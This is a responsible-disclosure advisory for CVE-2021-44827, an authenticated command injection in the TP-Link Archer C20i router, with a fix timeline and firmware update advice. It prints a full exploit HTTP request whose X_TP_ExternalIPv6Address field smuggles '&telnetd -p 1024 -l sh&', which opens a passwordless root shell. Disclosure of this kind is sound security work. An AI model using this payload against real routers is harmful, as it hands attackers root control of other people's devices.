CVE-2021-44827

Summary

TP-Link router Archer C20i contains authenticated remote code execution vulnerability.

Tech details

TP-Link router Archer C20i firmware version 0.9.1 3.2 v003a.0 Build 170221 Rel.55462 or older is vulnerable to authenticated remote code execution by injecting an OS command into the network interface configuration web request. Admin credentials are required to exploit it.

Vulnerability

The vulnerable parameter is X_TP_ExternalIPv6Address and an example of an exploit may look like this:

POST /cgi?2&2 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Content-Type: text/plain
Content-Length: 657
Origin: http://192.168.0.1
Connection: close
Cookie: Authorization=Basic YWRtaW46a2o4NzZmc2Q1NjI0ODk=

[WAN_ETH_INTF#1,0,0,0,0,0#0,0,0,0,0,0]0,1
X_TP_lastUsedIntf=ipoe_eth3_s
[WAN_IP_CONN#1,1,1,0,0,0#0,0,0,0,0,0]1,21
externalIPAddress=192.168.9.222
subnetMask=255.255.255.0
defaultGateway=192.168.9.2
NATEnabled=1
X_TP_FullconeNATEnabled=0
X_TP_FirewallEnabled=1
X_TP_IGMPProxyEnabled=1
X_TP_IGMPForceVersion=0
maxMTUSize=1500
DNSOverrideAllowed=1
DNSServers=192.168.9.3,0.0.0.0
X_TP_IPv4Enabled=1
X_TP_IPv6Enabled=0
X_TP_IPv6AddressingType=Static
X_TP_ExternalIPv6Address=&telnetd -p 1024 -l sh&
X_TP_PrefixLength=64
X_TP_DefaultIPv6Gateway=::
X_TP_IPv6DNSOverrideAllowed=0
X_TP_IPv6DNSServers=::,::
X_TP_MLDProxyEnabled=0
enable=1

This authenticated web request would start a telnet server on tcp port 1024 and allow root connection without a password.

Proof-of-concept

A proof of concept python script is available in this repo:

https://github.com/full-disclosure/CVE-2021-44827

Update is available

To mitigate the issue please update to the latest available firmware from TP-Link:

https://www.tp-link.com/en/support/download/archer-c20i/#Firmware

Full Disclosure team recommends using routers that support OpenWRT.

Timeline

2021-12-08 - initial research
2021-12-09 - CVE-2021-44827 assigned
2021-12-13 - an exploit PoC sent to TP-Link
2021-12-21 - TP-Link confirmed the issue
2022-01-18 - TP-Link releases a fixed firmware and asks to verify
2022-02-17 - TP-Link publishes the fixed firmware
2022-03-02 - full disclosure